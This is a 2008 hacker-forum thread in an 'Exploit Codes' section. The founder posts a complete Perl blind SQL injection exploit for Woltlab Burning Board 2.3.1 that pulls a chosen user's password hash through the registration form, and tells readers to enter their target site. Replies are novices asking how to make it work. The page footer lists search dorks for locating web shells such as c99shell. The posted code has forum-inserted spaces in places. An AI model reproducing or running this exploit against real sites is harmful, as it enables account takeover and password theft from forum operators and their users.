BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes

Notices

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack Thread Tools Display Modes
Old 06-08-2008   #11 (permalink)
Junior Member
 
Join Date: Jun 2008

Posts: 12
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 22 blazekvcd is on a distinguished road
Default

im new i tried i failed heres screens

blazekvcd is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote

Old 06-08-2008   #12 (permalink)
Founder
 
The Boss's Avatar
 
Join Date: Mar 2006

Posts: 7,413
Thanks: 130
Thanked 232 Times in 139 Posts
Rep Power: 285 The Boss has a reputation beyond repute
The Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to The Boss
Default

use this code.... make sure to edit the website url and userid things

Code:
my $host = 'www.websitetoexploit.net';
my $path = '/forums/'; # path to the board /forums/ is most common
my $userid = 1; # the password hash will be from the user with this id
my $username = 'anyusername'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = ''; # use 'email address entered is already ta' for english boards not needed

use strict;
use IO::Socket::INET;


$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit www.security-project.org
Exploit by deluxe89
----------
";



my $host = 'www.websitetoexploit.net';
my $path = '/forums/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'anyusername'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = ''; # use 'email address entered is already ta' for english boards


# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
print "[~] Using a proxy\n";
}
else
{
print "[~] You're using NO proxy!\n";
sleep(1);
}





#
# Get the hash
#

print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";


my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] 

Could not connect to server');

if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";


sub test
{
my ($i, $num, $g) = @_;

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could 

not connect to server');
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aa aaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_ic 

q=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=& r_gender=0&r_signature=&r_usertext=&field%5B1%5D=& 

field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecoo kies=1&r_admincanemail=1&r_showemail=1&r_usercanem 

ail=1&r_emailnotify=0&r_notificationperpm=0&r_rece ivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures 

=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_ umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_ti 

meformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_ usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid= 

&disclaimer=viewed";

print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: 

application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";


while(<$sock>)
{
if($_ =~ m/$error/) { return 1; }
}
return 0;
}
The Boss is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-26-2008   #13 (permalink)
Junior Member
 
mitch's Avatar
 
Join Date: Jun 2008

Posts: 15
Thanks: 1
Thanked 0 Times in 0 Posts
Rep Power: 21 mitch will become famous soon enough
Default

i make it,like you written,

getting the hash,wait some minutes
hash:aaaaaaaaaaaaa

and then it remains on c:\perl\bin


whats the next step,or where can i see if the exploit has success?
mitch is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-26-2008   #14 (permalink)
Respected Member
 
Spore's Avatar
 
Join Date: Jun 2008

Location: BHZ Forum
Posts: 777
Thanks: 0
Thanked 3 Times in 3 Posts
Rep Power: 39 Spore has a spectacular aura aboutSpore has a spectacular aura aboutSpore has a spectacular aura about
Default

any find me a bord to try this on and ill let you know how i get on
__________________
signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high.
Spore is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2008   #15 (permalink)
Junior Member
 
Join Date: Jun 2008

Posts: 10
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 21 kthxbai will become famous soon enough
Default

ty mate alot
kthxbai is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-28-2008   #16 (permalink)
Junior Member
 
mitch's Avatar
 
Join Date: Jun 2008

Posts: 15
Thanks: 1
Thanked 0 Times in 0 Posts
Rep Power: 21 mitch will become famous soon enough
Default

anyone can help?
mitch is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 07-16-2008   #17 (permalink)
Junior Member
 
Join Date: Jul 2008

Posts: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 jocko will become famous soon enough
Default

Heya. THanks for this. But man i am just want to ask u if this is realy for IPB 2.3.x because when i am trying to connect its say cant connect,,,,so?
jocko is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 07-16-2008   #18 (permalink)
Junior Member
 
Join Date: Jul 2008

Posts: 31
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 20 ^Predator will become famous soon enough
Default

What should I write to the field e-mail address? Can i live this blank, or i shuould not delete anything there?
^Predator is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 08-24-2008   #19 (permalink)
Leecher
 
Join Date: Aug 2008

Posts: 1
Thanks: 1
Thanked 0 Times in 0 Posts
Rep Power: 0 Noxen will become famous soon enough
Default

Hey, for me It gives me an error saying maybe I did not load IO::Socket::INET
How to I load it? And second, do I add the code
Code:
<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>#!/usr/bin/perl

use strict;
use IO::Socket::INET;
Noxen is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 08-24-2008   #20 (permalink)
Junior Member
 
Join Date: Aug 2008

Posts: 12
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 15 goldhack will become famous soon enough
Default

thanxxxxxxxxxxxx
goldhack is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
phpBB 2.0.21 (alltopics.php) SQL Injection Exploit Armageddon Exploit Codes 0 08-06-2008 12:01 PM
ODFaq 2.1.0 Blind SQL Injection Exploit Armageddon Exploit Codes 0 08-04-2008 01:40 PM
HRS Multi Blind SQL Injection Exploit Armageddon Exploit Codes 0 08-01-2008 03:04 PM
Remote SQL Injection Exploit Immortal Exploit Codes 0 05-28-2008 10:21 PM
phpBB 3 Remote SQL Injection Exploit KnightRider Exploit Codes 2 05-24-2008 07:52 AM

These are the 100 most searched terms
Search Cloud
(intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack bad hackerz badgewinners.com badhackerz badhackerz.com c99shell c99shell powered by admin c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm cousin ki chudai dhcp sniffer eset nod32 rapidshare evan poczik evllp.dll free tamil sex stories hotmail phisher idm 512 infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare nod32 rapidshare.com pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rapidshare rosetta stone rosetta stone application rosetta stone rapidshare rosetta stone romanian rosetta stone update safe-mode: off (not secure) drwxrwxrwx c99shell sigma 1.7 softjtag tamil sex stories tera patrick rapidshare vbulletin 3.7.0 exploit vbulletin exploit www.badhackerz.com ... powered by Simple Search Cloud

All times are GMT +5.5. The time now is 10:49 AM.


Website Design by How.ToDesignYour.Com
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios